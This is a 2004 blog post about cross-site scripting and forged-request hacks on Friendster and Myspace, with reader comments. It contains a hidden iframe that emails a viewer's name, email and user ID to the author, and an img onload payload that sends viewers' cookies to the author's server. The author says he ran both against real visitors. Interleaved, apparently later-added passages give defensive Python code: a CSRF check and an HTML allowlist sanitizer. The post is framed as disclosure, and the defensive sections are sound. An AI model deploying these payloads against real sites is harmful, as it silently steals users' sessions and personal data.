05.02.04

Hacking Friendster, Part I

EDITOR'S NOTE: I have posted these hacks in the hopes of publicizing security holes and forcing the networks to close them. Please do not send me email, myspace messages, or friendster messages asking me to spend my free time helping you duplicate this hack. Both Myspace and Friendster have modified their sites enough so that these hacks no longer work. In addition, this article contained far more than enough information to duplicate these hacks (when they worked), and still contains enough information to build similar hacks today. If you do not understand how to make similar hacks, consider doing your own research. If you want my help learning CGI and DHTML/JavaScript, I am available as an independent contractor and instructor at the rate of $60/hr. If you contact me asking for assistance in stealing other people's personal information I will forward your email to the relevant social network's abuse contact person, and recommend that they deactivate your account.

This is the first in a series of articles that expose security flaws in social networks. The two hacks described here are cross-site scripting attacks.

My Friendster profile has a link to my homepage. And my homepage has an embedded iframe which uses a GET query string to call the "Forward this profile to another user" function of Friendster.

In other words, by loading my webpage, your browser loads a page which sends an email to me, via the Friendster service. This email contains: your first & last name, the email you used to sign up to Friendster, your Friendster user-id, and a link which I can use to sign up to Friendster and automatically become your friend. There is no record of this anywhere on your Friendster account; it is totally invisible.

Here's the code in my homepage:

<iframe src="http://www.friendster.com/forward?id=229243&email=MYEMAIL&subject=friendsterview&message=friendsterview" width="1" height="1"></iframe>

Here's a sample of what gets sent in email:

Matt Chisholm has forwarded a user's profile to you from Matt's
personal network on Friendster.

Matt is 27 in San Francisco, CA.

If you are a Friendster member, you can view Matt's profile by
clicking below:
http://www.friendster.com/user.jsp?id=229243

If you are not a Friendster member yet, you can join Friendster by
clicking below:
http://www.friendster.com/join.jsp?inviteuser=229243

Friendster is an online community that connects people through networks
of friends for dating or making new friends.

Once you join Friendster, you will be automatically connected to your
friend Matt, and all of Matt's friends.

Friendster is inadvertently impervious to this attack, however, since you are often logged out within moments of logging in, and when you do successfully stay logged in, the site is either too slow or by that point my profile is no longer in your "Personal Network."
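The forward endpoint above is a state-changing action that fires on a plain GET carrying the viewer's session cookie, which is the pattern now called cross-site request forgery. As an added example (not Friendster's code, and written against a hypothetical in-memory session store and a hypothetical site origin), here is how a server-side handler for such an action can refuse forged requests: state changes only on POST, a per-session secret token that a third-party page cannot read, and a same-origin check on the Origin/Referer header as defence in depth.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Hypothetical origin of the social network; an attacker's page has a different one.
SITE_ORIGIN = "http://www.friendster.example"


@dataclass
class Session:
    user_id: int
    # Random per-session token; it never leaves the site's own pages, so a
    # cross-site <iframe> or <img> request cannot include it.
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


# Constructed in-memory session store: session cookie value -> Session.
SESSIONS: dict = {}


def login(user_id: int) -> str:
    """Create a session and return the cookie value the browser would store."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = Session(user_id=user_id)
    return sid


def csrf_token_for(sid: str) -> str:
    """Token the site embeds as a hidden field in its own 'forward' form."""
    return SESSIONS[sid].csrf_token


def same_origin(url: str) -> bool:
    """Compare scheme and host exactly; a prefix test would accept look-alike hosts."""
    want = urlsplit(SITE_ORIGIN)
    got = urlsplit(url)
    return (got.scheme, got.netloc) == (want.scheme, want.netloc)


def handle_forward(method: str, cookies: dict, headers: dict, params: dict):
    """Hypothetical handler for 'forward this profile'. Returns (status, body)."""
    sess = SESSIONS.get(cookies.get("session", ""))
    if sess is None:
        return 401, "not logged in"
    # 1. Never perform a state change on GET: an <iframe src=...> or <img src=...>
    #    on any page can only issue GET requests.
    if method != "POST":
        return 405, "state-changing action requires POST"
    # 2. Defence in depth: if the browser tells us where the request came from,
    #    it must be our own origin. (Referer can be stripped, so this alone is not enough.)
    source = headers.get("Origin") or headers.get("Referer")
    if source is not None and not same_origin(source):
        return 403, "cross-site request rejected"
    # 3. Primary check: the request must carry the per-session token, compared in
    #    constant time.
    token = params.get("csrf_token", "")
    if not hmac.compare_digest(token, sess.csrf_token):
        return 403, "missing or invalid CSRF token"
    return 200, "profile %s forwarded to %s by user %d" % (
        params.get("id", ""), params.get("email", ""), sess.user_id)


if __name__ == "__main__":
    sid = login(4242)
    browser_cookies = {"session": sid}
    # What a hidden 1x1 iframe on a third-party page produces: a GET with cookies.
    print(handle_forward("GET", browser_cookies, {"Referer": "http://attacker.example/"},
                         {"id": "229243", "email": "me@example.invalid"}))
    # The site's own form: POST, same origin, valid token.
    print(handle_forward("POST", browser_cookies, {"Origin": SITE_ORIGIN},
                         {"id": "229243", "email": "me@example.invalid",
                          "csrf_token": csrf_token_for(sid)}))
```

A modern deployment would add the SameSite attribute to the session cookie so the browser itself withholds it on cross-site subresource loads, but the token check is the part that does not depend on client behaviour.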

The security holes on Myspace, while they have gotten better, are much deeper. For a long time, they allowed free HTML entry in all fields, and they still allow some HTML entry.

For a long time, you could embed an image in your Myspace profile which called another Myspace function, so you effectively could cause a user viewing your profile (or anything with text that you created) to execute any Myspace function with your own parameters.

In these heady days of Myspace hackability, Jonathan & I created some interesting myspace hacks, which he will describe in a later post.

At some point, someone at Myspace wised up, and stopped allowing HTTP GET requests, and then they blacklisted the <iframe> and <script> tags, added javascript to their pages to prevent them being loaded in frames, and at least at one point, someone removed a hack from my profile. (Plus for some reason they don't allow # characters in text.)

Myspace hasn't completely closed off their security holes, however. The numerous javascript event handlers are still allowed, and so are image tags, so you can embed a 1x1 image, and execute arbitrary javascript on image load.

My javascript of choice attempts to log who is viewing my profile, by sending the content of the launchIC function, which contains the viewer's UID, and all of their browser cookies, to php on my site which mails it to me.

<img src="images/new_logo_test11.gif" width="10" id="h44" height="10" onload="document.getElementById('h44').src= 'http://www.theory.org/~matt/myspace.php?u='+ escape(document.cookie)+launchIC;">

The email I get looks like this (you can see my userid down there being assigned to memberID, and the cookie content varies greatly depending on what the user has been doing):

myspace view from
IMREQUESTCHECK={ts '2004-02-05 00:43:03'}
MYUSERINFO=M)NOMP_;R2P6%P]>35)6OF/N$5%:C4MIYK,N7@Y'!2\N
6R ??S\/&1/[**0K:R_DIS10DSZOKX@ !
function launchIC(destinationMemberID) {    memberID = \"104189\"
   PrivoxyWindowOpen(\"index.cfm?fuseaction=messanger

As before, there is no record anywhere that the user can see.
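Blacklisting <iframe> and <script> while leaving event-handler attributes in place is exactly the gap the image tag above walks through. The usual fix for sites that accept user HTML is an allowlist: keep only known tags and known attributes, drop every on* attribute, and accept only http/https (or relative) URLs. The following is an added example, not Myspace's code, built on Python's standard-library HTMLParser with a hypothetical allowlist; it is run against the profile payload from this post to show what survives.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hypothetical allowlist for a profile page: anything not listed is dropped.
ALLOWED_TAGS = {"b", "i", "u", "p", "br", "a", "img"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "width", "height", "alt"}}
VOID_TAGS = {"br", "img"}
# Elements whose content is discarded too (script bodies, framed pages).
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed"}
SAFE_SCHEMES = {"", "http", "https"}  # "" = relative URL


def safe_url(value: str) -> bool:
    """Reject javascript:, vbscript:, data: and friends, after removing control
    characters that browsers ignore but that can hide the scheme."""
    cleaned = "".join(ch for ch in value if ord(ch) >= 0x20).strip()
    return urlsplit(cleaned).scheme.lower() in SAFE_SCHEMES


class Sanitizer(HTMLParser):
    def __init__(self):
        # convert_charrefs=True: entities such as &#58; are decoded before we
        # see attribute values, so an encoded 'javascript:' cannot slip past.
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside a DROP_WITH_CONTENT element

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return  # drop the tag, keep its text content
        kept = []
        for name, value in attrs:
            name = name.lower()
            # Event handlers are never allowed, whatever the tag.
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            value = value or ""
            if name in ("href", "src") and not safe_url(value):
                continue
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth -= 1
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))


def sanitize(fragment: str) -> str:
    """Return an allowlisted re-serialisation of a user-supplied HTML fragment."""
    p = Sanitizer()
    p.feed(fragment)
    p.close()
    return "".join(p.out)


# The profile image tag from this post (constructed copy), used as sample input.
PROFILE_PAYLOAD = (
    '<img src="images/new_logo_test11.gif" width="10" id="h44" height="10" '
    "onload=\"document.getElementById('h44').src= "
    "'http://www.theory.org/~matt/myspace.php?u='+ escape(document.cookie)+launchIC;\">"
)

if __name__ == "__main__":
    print(sanitize(PROFILE_PAYLOAD))
    print(sanitize('<a href="javascript:alert(1)">hi</a><iframe src="http://x/">x</iframe>'))
```

The payload comes out as a plain image: the onload handler is gone, and the id attribute is dropped too, so the markup can no longer refer to itself. Rebuilding the output from parsed tokens, rather than deleting patterns from the input string, is what makes the result predictable; a blacklist that removes "<script>" leaves every other path to script execution open.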

And now for the question on everyone's mind. What is the upshot of all of this hacking? Who's viewing my profiles and checking out my webpage? The answers are actually quite depressing. The Friendster hack catches my friends more often than anyone else. And the people who view my Myspace profile fall into two categories: gay guys in San Francisco, and eighteen year-olds in the suburbs. I've even mailed girls on Myspace who have responded apparently without looking at my profile at all.

I leave the ramifications of this kind of insecurity in the hands of a malicious user as an exercise to the reader.

Update 10-02-2004: I should think it's obvious from this article that if you load up either url and are logged in to myspace or friendster, I will get an email with your userid. This is how I know that the ubiquitous myspace admin, Tom (userid #6221) just viewed my profile at about 8:50 pm PST tonight. I can only assume (since absolutely no one has viewed my profile there for months prior to posting this article) that this viewing event was in response to reading this article. Yay for him! I could tell you what zip code he lives in and what parameters he's been using to browse the myspace network, but I'm a nice guy and I won't. Hopefully myspace will close up their free-html security holes and not delete my account for what I'm sure is a TOS violation under some interpretations.

Update 15-02-2004: Some people have asserted that posting this kind of information on my blog is "not cool." These vulnerabilities in free HTML entry are well known, well documented vulnerabilities. I haven't discovered a new thing here; any nimrod with a DHTML manual can do this. If you run a website where people can enter free HTML, you should protect yourself and your users from these vulnerabilities. With a little bit of effort, a social engineering virus like MYDOOM could be spreading on Myspace, bringing the myspace servers to their knees and frustrating users into quitting the service.

If you are interested, I am part of a consulting company which will do security consulting for sites like these.

Update II: 15-02-2004: Some enterprising Myspace denizens have been copying and pasting my Myspace hack into their profiles. If you do this, the hack will just mail all of the information it collects to me; you will gain nothing, and it clutters up my inbox. If you want to duplicate this hack you'll have to set up a mailing script on your own site.

Update III: 26-02-2004: Jonathan has posted Hacking Social Networks Part II: Don't search private data. Check back for the third installment soon.

Posted by matt at 05.02.04 01:20

Comments

Only Friendster is abysmally slow, so as not to provide any actual interesting interaction.

Posted by: voidref at 07.02.04 00:06

Orkut has similar issues, since a lot of stuff (like adding communities and friends) is done via simple GET requests (although others are wrapped in serious amounts of javascript).

Posted by: James at 07.02.04 11:16

So ... couldn't you just do this by parsing the Apache referrer logs? Why bother "hacking" Friendster?

Arbitrary HTML on the other hand ... ugh. How hard could it be to put some dicey VBScript in there?

Posted by: Joe Grossberg at 09.02.04 15:14